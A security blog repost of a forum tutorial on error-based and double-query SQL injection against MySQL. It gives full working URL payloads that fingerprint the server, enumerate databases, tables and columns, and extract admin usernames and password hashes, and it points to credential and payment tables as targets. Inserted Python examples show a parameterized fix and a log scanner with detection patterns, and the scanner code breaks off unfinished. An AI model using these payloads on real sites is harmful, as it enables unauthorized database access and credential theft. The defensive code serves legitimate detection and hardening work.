Blog on Information &amp; Network Security | Sharing is Caring | Search, Learn, Share | Fahim<br />2013-09-04: [TUT]SQL Injection - Error Based and Double Query<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
[TUT]SQL Injection - Error Based and Double Query.<br /><br />Hello, Nueral-Security members.<br /><br /><span class="bbc_color" style="color: red;">This tutorial is purely for educational purposes!<br />Any misuse of my tutorials is at your own risk!</span><br /><br />We will need a few things for this tutorial.<br />It's a lot more complicated than my last two tutorials.</div>
<br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Firefox </span><a class="bbc_link" href="http://www.mozilla.org/en-US/firefox/new/" style="background-color: #282828; color: cornflowerblue; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px; text-decoration: none;" target="_blank">Download latest version of Firefox</a><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;"> </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(For the Hackbar add-on)</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. 
Hackbar </span><a class="bbc_link" href="https://addons.mozilla.org/nl/firefox/addon/hackbar/" style="background-color: #282828; color: cornflowerblue; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px; text-decoration: none;" target="_blank">Install Hackbar on Firefox</a><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;"> </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(To easily adapt complex attack vectors).</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Any text editor. </span><span class="bbc_size" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 8pt; line-height: 1.4em;">(To paste the database information into).</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><br />
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br />First of all I would like to explain what error based SQL injection is,<br />and then explain the difference between error based and Double Query SQL Injection.<br /><br /><br />Error based:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">By injecting a specific query (I will show you this later in the tutorial) we get an error message returned in the page.<br />This message actually gives us sensitive database information. That's why we call this error based SQL injection.</span><br /><br />Double Query:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Works exactly the same as error based injection, but the error based query is doubled into a single query statement,<br />so that we again successfully get an error message.</span><br /><br />Now, that was a short explanation of error based and double query SQL Injection!<br />This should give you a basic idea of what we are dealing with!<br /><br />Let's get started!<br /><br /><span class="bbc_color" style="color: green;">Determine when we should use error or double query Injection.</span><br /><br />When you did order by and got the column count (you can learn this method in my first tutorial),<br />and you switch over to union select statements, the page then returns an error saying something like:<br /><br />Case 1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">The Used Select Statements Have Different Number Of Columns.</code>Case 2:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Unknown column 1;</code>Case 3:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Nothing returns at all, and you can't find the columns in the web content.<br />Then you can also use error based Injection.</code><br />These are the most common cases in which we can use error based and double query Injection.<br />Now that we know when to use this, and you have a page with a case like that, let's move on!<br /><br /><span class="bbc_color" style="color: green;">Using Error based injection.</span><br /></div>
<span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Get the MySQL Version.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. Get the Database Name.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Get the Table Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">4. Get the Column Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">5. Extracting Information from the Columns.</span><br />
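All five steps below depend on one property of the target page: the raw database error is echoed into the HTML. The following is an added example, not the tutorial's code, showing that vulnerable pattern beside its hardened form in Python; sqlite3 stands in for the MySQL backend, the table name tbl_news is borrowed from the tutorial, and the rows are constructed.

```python
import re
import sqlite3

# Constructed sample table standing in for the tutorial's page.php?id=N backend;
# the table name tbl_news comes from the tutorial, the rows are made up.
_SCHEMA = """
CREATE TABLE tbl_news (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO tbl_news VALUES (1, 'Welcome'), (2, 'Release notes'), (3, 'Maintenance window');
"""

SERVER_LOG = []  # where the hardened page keeps database error detail


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def _render(rows):
    return "\n".join(f"{row_id}: {title}" for row_id, title in rows)


def vulnerable_page(raw_id):
    """The pattern the tutorial exploits: the id parameter is pasted into the
    SQL text and any database error is echoed into the response.
    Returns (status, body)."""
    conn = _connect()
    try:
        rows = conn.execute(
            f"SELECT id, title FROM tbl_news WHERE id = {raw_id}"  # string concatenation
        ).fetchall()
        return 200, _render(rows)
    except sqlite3.Error as exc:
        # Echoing the driver's message is what turns an injection into a leak.
        return 200, f"Database error: {exc}"
    finally:
        conn.close()


def hardened_page(raw_id):
    """Same page with the three fixes that defeat error-based extraction:
    strict input typing, a bound parameter, and no error text in the response."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):   # only plain ASCII digits
        return 400, "Bad request"
    conn = _connect()
    try:
        rows = conn.execute(
            "SELECT id, title FROM tbl_news WHERE id = ?", (int(raw_id),)
        ).fetchall()
        return (200, _render(rows)) if rows else (404, "Not found")
    except sqlite3.Error as exc:
        SERVER_LOG.append(f"db error for id={raw_id!r}: {exc}")  # server side only
        return 500, "Internal error"
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("2", "1 or 1=1", "1 group by nosuchcol"):
        print(f"{probe!r:>24} vulnerable={vulnerable_page(probe)} hardened={hardened_page(probe)}")
```

The third probe shows the difference that matters for this tutorial: the vulnerable page returns the driver's error text (naming the unknown column), the hardened page never lets a non-numeric id reach SQL and keeps error detail in its own log.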
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br /><br /><span class="bbc_color" style="color: orange;">Get the MySQL Version.</span><br /><br />The query to get the MySQL version for error based injection is:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--</code><br />What does this line of code actually say?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We group by concat_ws because this concat lets us combine more than one value at a time.<br />In this case a colon (0x3a) and the version. All the other parts are there to make that value show up in our error message.</span><br /><br />Returned error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'5.1.41'~1' for key 1</code>This means the web page's backend runs MySQL version 5.1.41.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Database Name.</span><br /><br />Getting the database name is already a little more complicated.<br />First of all, there can be more than one database on a server. I'll explain how to find those as well!<br /><br />The query to get database names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Look closely at this query! Look for limit 0,1. This is how we find more databases inside a server.<br />Edit 0,1 to 1,1 and keep increasing (2,1 and further) until you don't see any changes any more.<br />That way you know you got all databases. Put those in a notepad; you will need the first one later on in this tutorial.<br /><br />What does this query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">In concat we can select more than one value, as I said before with the version. This time we select the database name using a method called cast.<br />You will be seeing more of cast as you advance in SQL Injection. We say we want the database name (as char) in characters, from information_schema, which is the metadata database.</span><br /><br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'Ignotus_1' for key 1</code>That means our database name is Ignotus_1.<br />When I increased the limit nothing changed, meaning we have only one database.<br /><br />Write down that database name; you will be needing it.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Table Names</span><br /><br />Now we are getting somewhere; we need the more difficult stuff. Getting the table names.<br />Be sure to use the Hackbar because it really eases your work.<br /><br />The query to get the table names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Yet again I use limit here. Only that way can you get all tables using error based injection.<br />By increasing that limit as previously explained you will find them all.<br /><br />As I said in my first tutorial, always look for useful tables. Admin tables, member tables, users: anything to do with user credentials is interesting.<br />For black hats, shop tables or payment sections are probably interesting as well, but I don't want to support black-hatting!<br /><br />What does this extremely large query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Using the select in the concat method again, and casting table_name as characters, we ask for the table name from information_schema (the metadata database).<br />That's the easiest explanation I can possibly give.</span><br /><br />For limit 0,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_news' for key 1</code>For limit 1,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_gallery' for key 1</code>For limit 2,1:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '~'tbl_userAdmins' for key 1</code><br />Finally something useful: <span class="bbc_color" style="color: red;">tbl_userAdmins</span>.<br />Now that we have ourselves an interesting table, we want to extract information out of it.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Column Names</span><br /><br />Yet another step further; this won't get any easier. And this is still regular error based, people.<br />SQL Injection is hard; you need your brains!<br /><br />The query to extract the column names from tables:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>Look carefully at this code: where it says TABLENAMEHERE we need to put our table name in hex. Be sure that 0x is in front so the MySQL server knows it is a hex literal.<br />In the Hackbar go to Encoding and choose the first hex encoding format. Or go to the following site and put the table name where it says "Say hello to my little friend": <a class="bbc_link" href="http://www.swingnote.com/tools/texttohex.php" style="color: cornflowerblue; text-decoration: none;" target="_blank">http://www.swingnote.com/tools/texttohex.php</a>. There is also a limit behind our hex value.<br />We are going to need this limit to successfully extract all columns.<br /><br />In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />Now what does our query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We select the column_name using cast and want it returned in characters using as char, from information_schema, but this time also filtered by the table:<br />the one we put there in hex. And with a limit, to get all the different columns in there.</span><br /><br />Now my first error is:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'admin_NAME' for key 1</code><br />That will get us the admin name column we need. If you haven't got that yet, just increase the limit.<br />Now I need my next column; I need the passwords, of course. For the sake of simplicity, that's my next one.<br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'admin_PWD' for key 1</code>Now we finally get on to the fun part, where we get our admin / PWD!!<br /><br /><span class="bbc_color" style="color: orange;">Extracting Information from the Columns.</span><br /><br />Everyone likes this part! The part where we finally get to something!<br />Anyway, I have to tell you this is only half of the tutorial. We only covered error based. Double Query is beyond this part.<br /><br /><br />(Beware: where it says <span class="bbc_color" style="color: green;">admin_Name</span> and <span class="bbc_color" style="color: green;">admin_PWD</span> you have to replace them with the username and password columns you extracted before!<br />Also where it says <span class="bbc_color" style="color: cyan;">tbl_userAdmins</span> put the table name you extracted the columns from.<br />Almost forgot the database name, did you? Well, this is where you need it. Where it says <span class="bbc_color" style="color: orange;">Ignotus_1</span> is where you put the database name.)<br />Our query to extract information:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br />What does this query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We select using concat and cast: admin_NAME, 0x7e (a tilde, ~, used as separator) and admin_PWD are put together in our error message,<br />as char (in characters) from the table tbl_userADMINS of the database Ignotus_1.</span><br /><br />Our error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1</code><br />Congratulations, you successfully injected a website vulnerable to error based SQL Injection (mouthful).<br />Username: uSploit<br />Password: 4c0e8eb3ed67f58dc56e724e5297a598 &lt;-- this is an MD5 hash; I won't teach you how to crack hashes.<br /><br /><span class="bbc_color" style="color: green;">Using Double Query Injection</span><br /></div>
<span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">*Short explanation*</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">1. Get the MySQL Version.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">2. Get the Database Name.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">3. Get the Table Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">4. Get the Column Names.</span><br style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;" /><span style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">5. Extracting Information from the Columns.</span><br />
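The five error based steps above and the double query variant outlined here share the same building blocks: a group by over floor(rand(0)*2) to force a duplicate-key error, information_schema lookups, cast/concat to carry a value, and the "Duplicate entry ... for key" text in the response. As an added example from the defender's side, not part of the tutorial, this Python scanner scores access-log requests against those building blocks and pulls the leaked value out of a response body; the log lines, IP addresses and response are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache common log format). The payloads are the
# tutorial's own, percent-encoded the way a browser sends them.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [04/Sep/2013:23:06:00 -0700] "GET /page.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Sep/2013:23:06:03 -0700] "GET /page.php?id=1%20or%201%20group%20by'
    '%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201-- HTTP/1.1" 200 843',
    '203.0.113.5 - - [04/Sep/2013:23:06:09 -0700] "GET /page.php?id=1%20and%20(select%201%20from'
    '%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))'
    '%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),'
    'floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 851',
    '198.51.100.7 - - [04/Sep/2013:23:07:00 -0700] "GET /page.php?id=42 HTTP/1.1" 200 5100',
    '203.0.113.5 - - [04/Sep/2013:23:07:30 -0700] "GET /page.php?id=1%20order%20by%205-- HTTP/1.1" 200 5120',
]

# Constructed response body: the MySQL error 1062 text as the tutorial sees it echoed.
SAMPLE_RESPONSE = "<html><body>Warning: Duplicate entry '~'5.1.41'~1' for key 1</body></html>"

# Signature name -> (regex over the normalized query string, weight). The set
# covers the building blocks every payload on the page shares: a group-by over
# floor(rand(0)*2) to force a duplicate-key error, information_schema lookups,
# cast(... as char) / concat() to carry a value into the error text, having min(),
# the fingerprint functions, the preceding order-by column count and a comment tail.
SIGNATURES = {
    "rand_groupby": (re.compile(r"floor\(rand\(0?\)\*2\)"), 3),
    "group_by": (re.compile(r"\bgroup by\b"), 1),
    "information_schema": (re.compile(r"\binformation_schema\.(tables|columns|schemata)\b"), 2),
    "cast_as_char": (re.compile(r"\bcast\(.+? as char\)"), 1),
    "concat": (re.compile(r"\bconcat(_ws)?\("), 1),
    "having_min": (re.compile(r"\bhaving min\("), 2),
    "fingerprint_fn": (re.compile(r"\b(version|database|user)\(\)"), 1),
    "order_by_probe": (re.compile(r"\border by \d+"), 2),
    "comment_tail": (re.compile(r"--\s*$|#$"), 1),
}
ALERT_THRESHOLD = 3  # one strong signature, or an order-by probe with a comment tail

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
DUP_ENTRY_RE = re.compile(r"Duplicate entry '(?P<value>.*?)' for key")


def normalize_query(url):
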